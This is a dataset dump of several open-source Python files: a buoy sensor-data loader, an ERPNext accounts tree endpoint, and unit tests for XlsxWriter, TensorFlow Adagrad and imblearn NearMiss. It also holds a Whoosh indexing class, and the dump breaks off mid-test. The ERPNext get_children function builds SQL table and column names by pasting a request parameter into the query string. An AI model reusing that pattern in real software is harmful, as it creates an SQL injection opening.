repo_name (string) | path (string) | copies (string) | size (string) | content (string) | license (string) | hash (int64) | line_mean (float64) | line_max (int64) | alpha_frac (float64) | autogenerated (bool)
---|---|---|---|---|---|---|---|---|---|---|
lindakukolich/sensor_data_exploration | sensor_data_exploration/data_collection/beacon_buoy_addData.py | 1 | 4451 | #! /usr/bin/env python
# 15.January.2014 Liz Brooks
# script to add SensorData values to the database
# from Beacon Buoys
# (run with -h to see full usage message)
# as new sensors are added, add them to the list of sensors (keys) in main.
import sys
import argparse
import urllib2
from datetime import datetime,tzinfo,timedelta
import populate
debug = True
deviceID='2232583' # buoy #5 Thompson Island Mooring Field
def get_args():
parser = argparse.ArgumentParser(description='Load historical data from beacon buoy into the database.')
parser.add_argument('--history', action='store_true',
help='Collect all available data.')
parser.add_argument('--current', action='store_true',
help='Collect data from dates more recent than those already in the database.')
parser.add_argument('--cesn', action='store_true',
help='use alternate url - cesn, rather than hobolink, to get data.')
args = parser.parse_args()
if args.history == args.current:
sys.exit("You must specify either --history OR --current")
return args
def get_data(url):
'''fetch data from this url'''
f = urllib2.urlopen(url)
datalist=f.readlines()
f.close()
return datalist
def clean_data(datalist,cesn_format):
data = []
if not cesn_format:
for i,line in enumerate(datalist):
if line.startswith('----'):
datalist = datalist[i+2:]
break
for line in datalist:
if line.startswith('#'): continue
data.append(line.split(','))
return data
class EST(tzinfo):
'''returns an object representing EST time zone offset'''
def utcoffset(self, dt):
return timedelta(hours=-5)
def dst(self, dt):
return timedelta(0)
def parse_dt(dt_string):
'''takes a string and returns a datetime object'''
tz = EST()
# '12/6/13 14:00:00', "Time, Eastern Daylight Time"
# or '2013-08-22 12:00:00'
if '/' in dt_string:
x=datetime.strptime(dt_string, "%m/%d/%y %H:%M:%S")
else:
x=datetime.strptime(dt_string, "%Y-%m-%d %H:%M:%S")
dt=datetime(int(x.year),int(x.month),int(x.day),int(x.hour),int(x.minute),int(x.second),tzinfo=tz)
return dt
if __name__ == '__main__':
args = get_args()
if debug: print "Starting Beacon Buoy population script..."
# list of sensors for this source: (sensor_id, field# Hobolink (default), field# Cesn)
keys=[("buoy5_Salinity",13,2),
("buoy5_CDOM",12,3),
("buoy5_WaterTemp",2,5),
("buoy5_AirTemp",7,6),
("buoy5_WindSpeed",3,7),
("buoy5_GustSpeed",4,8),
("buoy5_WindDir",5,9),
("buoy5_BuoyDir",6,10),
("buoy5_Pressure",10,11),
("buoy5_RelHumidity",8,12),
("buoy5_DewPt",9,13),
("buoy5_PAR",11,14),
]
# get sensor objects for each sensor
if debug: print "Getting sensor information..."
sensors=populate.get_sensors(keys)
# get data list
if debug: print "Reading data..."
url='http://webservice.hobolink.com/rest/public/devices/%s/data_files/latest/txt' % (deviceID,)
if args.cesn:
url='http://cesn.org/live/archive_Thompson.txt'
data = get_data(url)
data = clean_data(data,args.cesn)
# get the latest date already in the database
previous_load_date = None
if args.current:
previous_load_date = populate.database_latest_date(keys)
# load sensor data
if debug: print "Loading data..."
for entry in data:
timestamp = parse_dt(entry[1])
if args.current:
if previous_load_date and timestamp <= previous_load_date:
continue
for key in keys:
value = entry[ key[1] ]
if args.cesn:
value = entry[ key[2] ]
if not value: # skip empty cells
continue
if value.startswith('-888.') or value.startswith('-889.'):
continue
numeric = sensors[key[0]].data_is_number
if numeric:
value = float(value)
populate.load_data(sensor_id=sensors[key[0]], time_stamp=timestamp, num_value=value, value_is_number=True)
else:
populate.load_data(sensor_id=sensors[key[0]], time_stamp=timestamp, string_value=value)
if debug: print "Finishing Beacon Buoy population script..."
| mit | 3,915,266,116,321,284,600 | 33.503876 | 122 | 0.600764 | false |
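# A minimal, standalone sketch of the timestamp handling done by parse_dt() in
# the beacon buoy script above. It assumes the same two input formats
# ('%m/%d/%y %H:%M:%S' and '%Y-%m-%d %H:%M:%S') and the fixed UTC-5 offset of
# the EST helper class; it is illustrative only and not part of that script.
from datetime import datetime, timedelta, tzinfo

class _FixedEST(tzinfo):
    def utcoffset(self, dt):
        return timedelta(hours=-5)
    def dst(self, dt):
        return timedelta(0)

def _parse_buoy_timestamp(dt_string):
    fmt = "%m/%d/%y %H:%M:%S" if '/' in dt_string else "%Y-%m-%d %H:%M:%S"
    return datetime.strptime(dt_string, fmt).replace(tzinfo=_FixedEST())

# Both source formats resolve to the same timezone-aware datetime:
assert _parse_buoy_timestamp('12/6/13 14:00:00') == _parse_buoy_timestamp('2013-12-06 14:00:00')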
gangadhar-kadam/mic-erpnext | accounts/page/accounts_browser/accounts_browser.py | 5 | 1909 | from __future__ import unicode_literals
import webnotes
import webnotes.defaults
from webnotes.utils import flt
from accounts.utils import get_balance_on
@webnotes.whitelist()
def get_companies():
"""get a list of companies based on permission"""
# check if match permission exists
res = webnotes.conn.sql("""select role, `match` from `tabDocPerm`
where parent='Account' and permlevel=0 and `read`=1""", as_dict=1)
roles = webnotes.user.get_roles()
match = any((r["match"] for r in res
if r["role"] in roles and r["match"]=="company"))
# if match == company is specified and companies are specified in user defaults
if match:
return webnotes.defaults.get_user_default_as_list("company")
else:
return [r[0] for r in webnotes.conn.sql("""select name from tabCompany
where docstatus!=2""")]
@webnotes.whitelist()
def get_children():
args = webnotes.form_dict
ctype, company = args['ctype'], args['comp']
company_field = ctype=='Account' and 'company' or 'company_name'
# root
if args['parent'] == company:
acc = webnotes.conn.sql(""" select
name as value, if(group_or_ledger='Group', 1, 0) as expandable
from `tab%s`
where ifnull(parent_%s,'') = ''
and %s = %s and docstatus<2
order by name""" % (ctype, ctype.lower().replace(' ','_'), company_field, '%s'),
args['parent'], as_dict=1)
else:
# other
acc = webnotes.conn.sql("""select
name as value, if(group_or_ledger='Group', 1, 0) as expandable
from `tab%s`
where ifnull(parent_%s,'') = %s
and docstatus<2
order by name""" % (ctype, ctype.lower().replace(' ','_'), '%s'),
args['parent'], as_dict=1)
if ctype == 'Account':
currency = webnotes.conn.sql("select default_currency from `tabCompany` where name = %s", company)[0][0]
for each in acc:
bal = get_balance_on(each.get("value"))
each["currency"] = currency
each["balance"] = flt(bal)
return acc
| agpl-3.0 | -8,040,449,826,540,733,000 | 31.355932 | 106 | 0.65846 | false |
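# Illustrative sketch of the `match` permission check in get_companies() above,
# with plain data standing in for the webnotes database and session objects.
# The role names and permission rows are invented for the example.
perm_rows = [
    {"role": "Accounts Manager", "match": "company"},
    {"role": "Auditor", "match": None},
]
user_roles = ["Auditor", "Accounts Manager"]

restrict_to_user_companies = any(
    row["match"] == "company"
    for row in perm_rows
    if row["role"] in user_roles
)
print(restrict_to_user_companies)  # True -> only the user's default companies are listed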
liukaijv/XlsxWriter | xlsxwriter/test/workbook/test_workbook01.py | 8 | 1641 | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2015, John McNamara, [email protected]
#
import unittest
from ...compatibility import StringIO
from ..helperfunctions import _xml_to_list
from ...workbook import Workbook
class TestAssembleWorkbook(unittest.TestCase):
"""
Test assembling a complete Workbook file.
"""
def test_assemble_xml_file(self):
"""Test writing a workbook with 1 worksheet."""
self.maxDiff = None
fh = StringIO()
workbook = Workbook()
workbook._set_filehandle(fh)
workbook.add_worksheet()
workbook._assemble_xml_file()
workbook.fileclosed = 1
exp = _xml_to_list("""
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<fileVersion appName="xl" lastEdited="4" lowestEdited="4" rupBuild="4505"/>
<workbookPr defaultThemeVersion="124226"/>
<bookViews>
<workbookView xWindow="240" yWindow="15" windowWidth="16095" windowHeight="9660"/>
</bookViews>
<sheets>
<sheet name="Sheet1" sheetId="1" r:id="rId1"/>
</sheets>
<calcPr calcId="124519" fullCalcOnLoad="1"/>
</workbook>
""")
got = _xml_to_list(fh.getvalue())
self.assertEqual(got, exp)
| bsd-2-clause | -1,727,182,614,204,291,000 | 32.489796 | 170 | 0.551493 | false |
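# For contrast with the internal methods exercised by the test above
# (_set_filehandle, _assemble_xml_file), this is a small sketch of the public
# XlsxWriter API that produces the same kind of single-sheet workbook; the
# file name 'demo.xlsx' is arbitrary.
import xlsxwriter

workbook = xlsxwriter.Workbook('demo.xlsx')
worksheet = workbook.add_worksheet()   # defaults to "Sheet1"
worksheet.write(0, 0, 'hello')         # row 0, column A
workbook.close()                       # assembles and writes the workbook XML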
drpngx/tensorflow | tensorflow/python/training/adagrad_test.py | 11 | 13233 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for aggregate operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import embedding_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import adagrad
class AdagradOptimizerTest(test.TestCase):
def doTestBasic(self,
use_locking=False,
use_resource=False,
use_callable_params=False):
for dtype in [dtypes.half, dtypes.float32, dtypes.float64]:
if use_resource:
var0 = resource_variable_ops.ResourceVariable([1.0, 2.0], dtype=dtype)
var1 = resource_variable_ops.ResourceVariable([3.0, 4.0], dtype=dtype)
else:
var0 = variables.Variable([1.0, 2.0], dtype=dtype)
var1 = variables.Variable([3.0, 4.0], dtype=dtype)
grads0 = constant_op.constant([0.1, 0.1], dtype=dtype)
grads1 = constant_op.constant([0.01, 0.01], dtype=dtype)
learning_rate = lambda: 3.0
if not use_callable_params:
learning_rate = learning_rate()
ada_opt = adagrad.AdagradOptimizer(
learning_rate, initial_accumulator_value=0.1, use_locking=use_locking)
if not context.executing_eagerly():
ada_update = ada_opt.apply_gradients(
zip([grads0, grads1], [var0, var1]))
self.evaluate(variables.global_variables_initializer())
# Fetch params to validate initial values
v0_val, v1_val = self.evaluate([var0, var1])
self.assertAllClose([1.0, 2.0], v0_val)
self.assertAllClose([3.0, 4.0], v1_val)
# Run 3 steps of adagrad
for _ in range(3):
if not context.executing_eagerly():
self.evaluate(ada_update)
else:
ada_opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
# Validate updated params
v0_val, v1_val = self.evaluate([var0, var1])
self.assertAllCloseAccordingToType(
np.array([-1.6026098728179932, -0.6026098728179932]), v0_val)
self.assertAllCloseAccordingToType(
np.array([2.715679168701172, 3.715679168701172]), v1_val)
def testBasic(self):
self.doTestBasic(use_locking=False)
@test_util.run_in_graph_and_eager_modes(reset_test=True)
def testBasicResource(self):
self.doTestBasic(use_locking=False, use_resource=True)
def testBasicCallableParams(self):
with context.eager_mode():
self.doTestBasic(
use_locking=False, use_resource=True, use_callable_params=True)
def testBasicLocked(self):
self.doTestBasic(use_locking=True)
def testMinimizeSparseResourceVariable(self):
for dtype in [dtypes.half, dtypes.float32, dtypes.float64]:
with self.test_session():
var0 = resource_variable_ops.ResourceVariable(
[[1.0, 2.0], [3.0, 4.0]], dtype=dtype)
x = constant_op.constant([[4.0], [5.0]], dtype=dtype)
pred = math_ops.matmul(embedding_ops.embedding_lookup([var0], [0]), x)
loss = pred * pred
sgd_op = adagrad.AdagradOptimizer(1.0).minimize(loss)
variables.global_variables_initializer().run()
# Fetch params to validate initial values
self.assertAllCloseAccordingToType(
[[1.0, 2.0], [3.0, 4.0]], var0.eval())
# Run 1 step of sgd
sgd_op.run()
# Validate updated params
self.assertAllCloseAccordingToType(
[[0, 1], [3, 4]], var0.eval(), atol=0.01)
def testTensorLearningRate(self):
for dtype in [dtypes.half, dtypes.float32, dtypes.float64]:
with self.test_session():
var0 = variables.Variable([1.0, 2.0], dtype=dtype)
var1 = variables.Variable([3.0, 4.0], dtype=dtype)
grads0 = constant_op.constant([0.1, 0.1], dtype=dtype)
grads1 = constant_op.constant([0.01, 0.01], dtype=dtype)
ada_opt = adagrad.AdagradOptimizer(
constant_op.constant(3.0), initial_accumulator_value=0.1)
ada_update = ada_opt.apply_gradients(
zip([grads0, grads1], [var0, var1]))
variables.global_variables_initializer().run()
# Fetch params to validate initial values
self.assertAllClose([1.0, 2.0], var0.eval())
self.assertAllClose([3.0, 4.0], var1.eval())
# Run 3 steps of adagrad
for _ in range(3):
ada_update.run()
# Validate updated params
self.assertAllCloseAccordingToType(
np.array([-1.6026098728179932, -0.6026098728179932]), var0.eval())
self.assertAllCloseAccordingToType(
np.array([2.715679168701172, 3.715679168701172]), var1.eval())
def testSparseBasic(self):
for dtype in [dtypes.half, dtypes.float32, dtypes.float64]:
with self.test_session():
var0 = variables.Variable([[1.0], [2.0]], dtype=dtype)
var1 = variables.Variable([[3.0], [4.0]], dtype=dtype)
grads0 = ops.IndexedSlices(
constant_op.constant(
[0.1], shape=[1, 1], dtype=dtype),
constant_op.constant([0]),
constant_op.constant([2, 1]))
grads1 = ops.IndexedSlices(
constant_op.constant(
[0.01], shape=[1, 1], dtype=dtype),
constant_op.constant([1]),
constant_op.constant([2, 1]))
ada_opt = adagrad.AdagradOptimizer(3.0, initial_accumulator_value=0.1)
ada_update = ada_opt.apply_gradients(
zip([grads0, grads1], [var0, var1]))
variables.global_variables_initializer().run()
# Fetch params to validate initial values
self.assertAllClose([[1.0], [2.0]], var0.eval())
self.assertAllClose([[3.0], [4.0]], var1.eval())
# Run 3 step of sgd
for _ in range(3):
ada_update.run()
# Validate updated params
self.assertAllCloseAccordingToType(
np.array([[-1.6026098728179932], [2.0]]), var0.eval())
self.assertAllCloseAccordingToType(
np.array([[3.0], [3.715679168701172]]), var1.eval())
def testSparseRepeatedIndices(self):
for dtype in [dtypes.half, dtypes.float32, dtypes.float64]:
with self.test_session():
repeated_index_update_var = variables.Variable(
[[1.0], [2.0]], dtype=dtype)
aggregated_update_var = variables.Variable(
[[1.0], [2.0]], dtype=dtype)
grad_repeated_index = ops.IndexedSlices(
constant_op.constant(
[0.1, 0.1], shape=[2, 1], dtype=dtype),
constant_op.constant([1, 1]),
constant_op.constant([2, 1]))
grad_aggregated = ops.IndexedSlices(
constant_op.constant(
[0.2], shape=[1, 1], dtype=dtype),
constant_op.constant([1]),
constant_op.constant([2, 1]))
repeated_update = adagrad.AdagradOptimizer(3.0).apply_gradients(
[(grad_repeated_index, repeated_index_update_var)])
aggregated_update = adagrad.AdagradOptimizer(3.0).apply_gradients(
[(grad_aggregated, aggregated_update_var)])
variables.global_variables_initializer().run()
self.assertAllClose(aggregated_update_var.eval(),
repeated_index_update_var.eval())
for _ in range(3):
repeated_update.run()
aggregated_update.run()
self.assertAllClose(aggregated_update_var.eval(),
repeated_index_update_var.eval())
def testSparseRepeatedIndicesResourceVariable(self):
for dtype in [dtypes.half, dtypes.float32, dtypes.float64]:
with self.test_session():
var_repeated = resource_variable_ops.ResourceVariable(
[1.0, 2.0], dtype=dtype)
loss_repeated = math_ops.reduce_sum(
embedding_ops.embedding_lookup(var_repeated, [0, 0]))
var_aggregated = resource_variable_ops.ResourceVariable(
[1.0, 2.0], dtype=dtype)
loss_aggregated = 2 * math_ops.reduce_sum(
embedding_ops.embedding_lookup(var_aggregated, [0]))
update_op_repeated = adagrad.AdagradOptimizer(
2.0).minimize(loss_repeated)
update_op_aggregated = adagrad.AdagradOptimizer(
2.0).minimize(loss_aggregated)
variables.global_variables_initializer().run()
self.assertAllCloseAccordingToType(
var_repeated.eval(), var_aggregated.eval())
for _ in range(3):
update_op_repeated.run()
update_op_aggregated.run()
self.assertAllCloseAccordingToType(
var_repeated.eval(), var_aggregated.eval())
def testSparseStability(self):
for dtype in [dtypes.half, dtypes.float32, dtypes.float64]:
with self.test_session():
shape = [1, 6]
var0 = variables.Variable(
[[
0.00872496, -0.106952, 0.110467, 0.226505, -0.0147257,
-0.0105945
]],
dtype=dtype)
grads0 = ops.IndexedSlices(
constant_op.constant(
[[
-5.91278e-05, 5.31673e-05, -2.5779e-06, 4.29153e-05,
-8.4877e-05, -9.48906e-05
]],
shape=shape,
dtype=dtype),
constant_op.constant([0]),
constant_op.constant(shape))
ada_opt = adagrad.AdagradOptimizer(1.0, initial_accumulator_value=0.1)
ada_update = ada_opt.apply_gradients(zip([grads0], [var0]))
self.assertEqual(["accumulator"], ada_opt.get_slot_names())
slot0 = ada_opt.get_slot(var0, "accumulator")
init = variables.global_variables_initializer()
for _ in range(100):
init.run()
ada_update.run()
self.assertAllCloseAccordingToType(
np.array([[0.1, 0.1, 0.1, 0.1, 0.1, 0.1]]), slot0.eval())
self.assertAllCloseAccordingToType(
np.array([[
0.00891194, -0.10712013, 0.11047515, 0.22636929, -0.0144573,
-0.01029443
]]), var0.eval())
def testSharing(self):
for dtype in [dtypes.half, dtypes.float32, dtypes.float64]:
with self.test_session():
var0 = variables.Variable([1.0, 2.0], dtype=dtype)
var1 = variables.Variable([3.0, 4.0], dtype=dtype)
grads0 = constant_op.constant([0.1, 0.1], dtype=dtype)
grads1 = constant_op.constant([0.01, 0.01], dtype=dtype)
ada_opt = adagrad.AdagradOptimizer(3.0)
# Apply the optimizer twice. Both applications will use
# the same accums.
ada_update1 = ada_opt.apply_gradients(
zip([grads0, grads1], [var0, var1]))
ada_update2 = ada_opt.apply_gradients(
zip([grads0, grads1], [var0, var1]))
self.assertEqual(["accumulator"], ada_opt.get_slot_names())
slot0 = ada_opt.get_slot(var0, "accumulator")
self.assertEquals(slot0.get_shape(), var0.get_shape())
slot1 = ada_opt.get_slot(var1, "accumulator")
self.assertEquals(slot1.get_shape(), var1.get_shape())
variables.global_variables_initializer().run()
# Fetch params to validate initial values.
self.assertAllClose([1.0, 2.0], var0.eval())
self.assertAllClose([3.0, 4.0], var1.eval())
# Mix the first and the second adagrad for 3 steps.
ada_update1.run()
ada_update2.run()
ada_update1.run()
# Validate updated params (the same as with only 1 Adagrad).
self.assertAllCloseAccordingToType(
np.array([-1.6026098728179932, -0.6026098728179932]), var0.eval())
self.assertAllCloseAccordingToType(
np.array([2.715679168701172, 3.715679168701172]), var1.eval())
def testDynamicShapeVariable_Ok(self):
with self.test_session():
v = variable_scope.get_variable("v", initializer=constant_op.constant(1.),
validate_shape=False)
self.assertFalse(v.shape.is_fully_defined())
# Creating optimizer should cause no exception.
adagrad.AdagradOptimizer(3.0, initial_accumulator_value=0.1)
if __name__ == "__main__":
test.main()
| apache-2.0 | 9,010,061,881,076,805,000 | 42.104235 | 80 | 0.617471 | false |
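# The expected values asserted above follow from the Adagrad update rule
# accum += grad**2; var -= lr * grad / sqrt(accum). This NumPy sketch is not
# part of the TensorFlow test; it just reproduces the -1.6026... figure
# checked in doTestBasic (var0=[1, 2], grads=[0.1, 0.1], lr=3.0,
# initial_accumulator_value=0.1, 3 steps).
import numpy as np

var = np.array([1.0, 2.0])
grad = np.array([0.1, 0.1])
lr = 3.0
accum = np.full_like(var, 0.1)

for _ in range(3):
    accum += grad ** 2
    var -= lr * grad / np.sqrt(accum)

print(var)  # ~[-1.60260987 -0.60260987], matching the asserted values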
codekansas/liveqa2017 | liveqa/vertical/indexing.py | 1 | 6517 | from unidecode import unidecode
from whoosh.analysis import StemmingAnalyzer
from whoosh.index import create_in, open_dir, exists_in
from whoosh.writing import AsyncWriter
from whoosh.fields import *
from whoosh.qparser import QueryParser, MultifieldParser, syntax
import os.path
import logging
import re
BASE = os.path.dirname(os.path.realpath(__file__))
INDEX_DIRECTORY = os.path.join(BASE, 'index/')
STOPWORDS_FILE = os.path.join(BASE, 'stopwords.txt')
BAD_WORDS_FILE = os.path.join(BASE, 'bad-words.txt')
class Indexing(object):
def __init__(self, mode='read', directory=INDEX_DIRECTORY):
"""Creates an Indexing object to communicate with Woosh.
Args:
mode: str (default: "read"), "read" or "write" (the mode to use).
directory: str, where to index files (defaults to INDEX_DIRECTORY).
"""
# self.schema = self.getSchema()
# if not os.path.exists("indexdir"):
# print ("directory not exist")
# os.mkdir("indexdir")
# self.ix = create_in("indexdir", self.schema)
# self.ix = open_dir("indexdir")
# self.writer = AsyncWriter(self.ix)
# self.writer = self.ix.writer()
# self.ix.reader()
self.directory = directory
self.isWriteModeOn = False
self.isReadModeOn = False
# Loads stopwords from the associated file.
with open(STOPWORDS_FILE, 'r') as f:
self.stoplist = set(f.read().strip().split())
with open(BAD_WORDS_FILE, 'r') as f:
self.bad_words = set(f.read().strip().split())
mode = mode.lower()
if mode == 'write':
self.turnOnWriteMode()
elif mode == 'read':
self.turnOnReadMode()
# Initializes the parsers.
self.question_parser = QueryParser('ba',
schema=self.ix.schema,
group=syntax.OrGroup)
self.answer_parser = QueryParser('title',
schema=self.ix.schema,
group=syntax.OrGroup)
self.searcher = self.ix.searcher()
else:
raise ValueError('Invalid mode: "%s" (should be "read" or '
'"write").' % mode)
def indexing(self, subject, content, bestAnswer):
# title = subject
# body = content
# ba = bestAnswer
if self.isWriteModeOn:
# exists = exists_in("indexdir")
# if not exists:
self.writer.add_document(title=subject,
body=content,
ba=bestAnswer)
# self.writer.commit()
def getSchema(self):
return Schema(title=TEXT(stored=True),
body=TEXT(analyzer=StemmingAnalyzer()),
ba=TEXT(stored=True))
def closeWriter(self):
self.writer.commit()
def closeIndexing(self):
self.ix.close()
def turnOnReadMode(self):
self.isReadModeOn = True
self.isWriteModeOn = False
self.schema = self.getSchema()
self.ix = open_dir(self.directory)
self.ix.reader()
def turnOnWriteMode(self):
self.isWriteModeOn = True
self.isReadModeOn = False
self.schema = self.getSchema()
if not os.path.exists(self.directory):
logging.info("directory does not exist")
os.mkdir(self.directory)
self.ix = create_in(self.directory, self.schema)
self.ix = open_dir(self.directory)
# self.writer = AsyncWriter(self.ix)
self.writer = self.ix.writer()
# def getIsNeedParse(self):
# return
def clean(self, text):
"""Cleans text before returning it to the user.
Args:
text: str, the text to clean.
Returns:
string, the cleaned text.
"""
text = text.replace('\n', ' ')
return text
def clean_query(self, text):
"""Does pre-processing on a query.
Args:
text: the query text.
Returns:
the cleaned query text as a string.
"""
tokens = re.findall('[\w\d\']+\'?[\w\d\']+', text)
query = ' '.join(t for t in tokens if t not in self.stoplist)
return query
def filter(self, texts):
"""Filters out examples with bad words in them.
Args:
texts: list of strings, the texts to filter.
Returns:
list of strings, the filtered texts.
"""
def not_bad(text):
return all(x.strip() not in self.bad_words
for x in text.lower().split(' '))
return [text for text in texts if not_bad(text)]
def get_top_n_questions(self, query, limit=500):
"""Returns the top questions related to a given query.
Args:
query: str, the query to parse.
limit: int, the maximum number of documents to return.
Returns:
list of strings, the top results for the given query.
"""
query = self.clean_query(query)
logging.info('query: %s', query)
# self.query = MultifieldParser(['title', 'body', 'ba'],
# schema=self.ix.schema,
# group=syntax.OrGroup).parse(query)
query = self.question_parser.parse(query)
results = self.searcher.search(query, limit=limit)
# Cleans the retrieved results.
results = [self.clean(result.get('title')) for result in results]
# Filters out "bad" answers.
results = self.filter(results)
return results
def get_top_n_answers(self, query, limit=500):
"""Returns the top results for a given query.
Args:
query: str, the query to parse.
limit: int, the maximum number of documents to return.
Returns:
list of strings, the top results for the given query.
"""
query = self.clean_query(query)
logging.info('query: %s', query)
query = self.answer_parser.parse(query)
results = self.searcher.search(query, limit=limit)
# Cleans the provided results.
results = [self.clean(result.get('ba')) for result in results]
# Filters out "bad" answers.
results = self.filter(results)
return results
| gpl-3.0 | 2,524,822,915,073,584,000 | 30.790244 | 79 | 0.552095 | false |
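# Standalone sketch of the query cleanup and "bad word" filtering performed by
# Indexing.clean_query() and Indexing.filter() above. The stoplist and bad-word
# set here are tiny stand-ins for the stopwords.txt / bad-words.txt files.
import re

stoplist = {'what', 'is', 'the', 'a'}
bad_words = {'badword'}

def clean_query(text):
    tokens = re.findall(r"[\w\d']+'?[\w\d']+", text)
    return ' '.join(t for t in tokens if t not in stoplist)

def keep_clean(texts):
    return [t for t in texts
            if all(w.strip() not in bad_words for w in t.lower().split(' '))]

print(clean_query("what is the car's top speed"))   # "car's top speed"
print(keep_clean(["fine answer", "badword here"]))  # ['fine answer']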
RPGOne/Skynet | imbalanced-learn-master/imblearn/under_sampling/tests/test_nearmiss_2.py | 1 | 6280 | """Test the module nearmiss."""
from __future__ import print_function
import os
import numpy as np
from numpy.testing import assert_raises
from numpy.testing import assert_equal
from numpy.testing import assert_array_equal
from numpy.testing import assert_warns
from sklearn.datasets import make_classification
from sklearn.utils.estimator_checks import check_estimator
from imblearn.under_sampling import NearMiss
# Generate a global dataset to use
RND_SEED = 0
X, Y = make_classification(n_classes=2, class_sep=2, weights=[0.1, 0.9],
n_informative=3, n_redundant=1, flip_y=0,
n_features=20, n_clusters_per_class=1,
n_samples=5000, random_state=RND_SEED)
VERSION_NEARMISS = 2
def test_nearmiss_sk_estimator():
"""Test the sklearn estimator compatibility"""
check_estimator(NearMiss)
def test_nearmiss_bad_ratio():
"""Test either if an error is raised with a wrong decimal value for
the ratio"""
# Define a negative ratio
ratio = -1.0
nm1 = NearMiss(ratio=ratio, random_state=RND_SEED)
assert_raises(ValueError, nm1.fit, X, Y)
# Define a ratio greater than 1
ratio = 100.0
nm1 = NearMiss(ratio=ratio, random_state=RND_SEED)
assert_raises(ValueError, nm1.fit, X, Y)
# Define ratio as an unknown string
ratio = 'rnd'
nm1 = NearMiss(ratio=ratio, random_state=RND_SEED)
assert_raises(ValueError, nm1.fit, X, Y)
# Define ratio as a list which is not supported
ratio = [.5, .5]
nm1 = NearMiss(ratio=ratio, random_state=RND_SEED)
assert_raises(ValueError, nm1.fit, X, Y)
def test_nearmiss_wrong_version():
"""Test either if an error is raised when the version is unknown."""
version = 1000
nm2 = NearMiss(version=version, random_state=RND_SEED)
assert_raises(ValueError, nm2.fit_sample, X, Y)
def test_nearmiss_init():
"""Test the initialisation of the object"""
# Define a ratio
ratio = 1.
nm2 = NearMiss(ratio=ratio, random_state=RND_SEED,
version=VERSION_NEARMISS)
assert_equal(nm2.version, VERSION_NEARMISS)
assert_equal(nm2.size_ngh, 3)
assert_equal(nm2.ratio, ratio)
assert_equal(nm2.random_state, RND_SEED)
def test_nearmiss_fit_single_class():
"""Test either if an error when there is a single class"""
# Define the parameter for the under-sampling
ratio = 'auto'
# Create the object
nm2 = NearMiss(ratio=ratio, random_state=RND_SEED,
version=VERSION_NEARMISS)
# Resample the data
# Create a wrong y
y_single_class = np.zeros((X.shape[0], ))
assert_warns(RuntimeWarning, nm2.fit, X, y_single_class)
def test_nm_fit_invalid_ratio():
"""Test either if an error is raised when the balancing ratio to fit is
smaller than the one of the data"""
# Create the object
ratio = 1. / 10000.
nm = NearMiss(ratio=ratio, random_state=RND_SEED)
# Fit the data
assert_raises(RuntimeError, nm.fit, X, Y)
def test_nm2_fit():
"""Test the fitting method"""
# Define the parameter for the under-sampling
ratio = 'auto'
# Create the object
nm2 = NearMiss(ratio=ratio, random_state=RND_SEED,
version=VERSION_NEARMISS)
# Fit the data
nm2.fit(X, Y)
# Check if the data information have been computed
assert_equal(nm2.min_c_, 0)
assert_equal(nm2.maj_c_, 1)
assert_equal(nm2.stats_c_[0], 500)
assert_equal(nm2.stats_c_[1], 4500)
def test_nm2_sample_wt_fit():
"""Test either if an error is raised when sample is called before
fitting"""
# Define the parameter for the under-sampling
ratio = 'auto'
# Create the object
nm2 = NearMiss(ratio=ratio, random_state=RND_SEED,
version=VERSION_NEARMISS)
assert_raises(RuntimeError, nm2.sample, X, Y)
def test_nm2_fit_sample_auto():
"""Test fit and sample routines with auto ratio"""
# Define the parameter for the under-sampling
ratio = 'auto'
# Create the object
nm2 = NearMiss(ratio=ratio, random_state=RND_SEED,
version=VERSION_NEARMISS)
# Fit and sample
X_resampled, y_resampled = nm2.fit_sample(X, Y)
currdir = os.path.dirname(os.path.abspath(__file__))
X_gt = np.load(os.path.join(currdir, 'data', 'nm2_x.npy'))
y_gt = np.load(os.path.join(currdir, 'data', 'nm2_y.npy'))
assert_array_equal(X_resampled, X_gt)
assert_array_equal(y_resampled, y_gt)
def test_nm2_fit_sample_auto_indices():
"""Test fit and sample routines with auto ratio and indices support"""
# Define the parameter for the under-sampling
ratio = 'auto'
# Create the object
nm2 = NearMiss(ratio=ratio, random_state=RND_SEED,
version=VERSION_NEARMISS, return_indices=True)
# Fit and sample
X_resampled, y_resampled, idx_under = nm2.fit_sample(X, Y)
currdir = os.path.dirname(os.path.abspath(__file__))
X_gt = np.load(os.path.join(currdir, 'data', 'nm2_x.npy'))
y_gt = np.load(os.path.join(currdir, 'data', 'nm2_y.npy'))
idx_gt = np.load(os.path.join(currdir, 'data', 'nm2_idx.npy'))
assert_array_equal(X_resampled, X_gt)
assert_array_equal(y_resampled, y_gt)
assert_array_equal(idx_under, idx_gt)
def test_nm2_fit_sample_half():
"""Test fit and sample routines with .5 ratio"""
# Define the parameter for the under-sampling
ratio = .5
# Create the object
nm2 = NearMiss(ratio=ratio, random_state=RND_SEED,
version=VERSION_NEARMISS)
# Fit and sample
X_resampled, y_resampled = nm2.fit_sample(X, Y)
currdir = os.path.dirname(os.path.abspath(__file__))
X_gt = np.load(os.path.join(currdir, 'data', 'nm2_x_05.npy'))
y_gt = np.load(os.path.join(currdir, 'data', 'nm2_y_05.npy'))
assert_array_equal(X_resampled, X_gt)
assert_array_equal(y_resampled, y_gt)
def test_nm2_sample_wrong_X():
"""Test either if an error is raised when X is different at fitting
and sampling"""
# Create the object
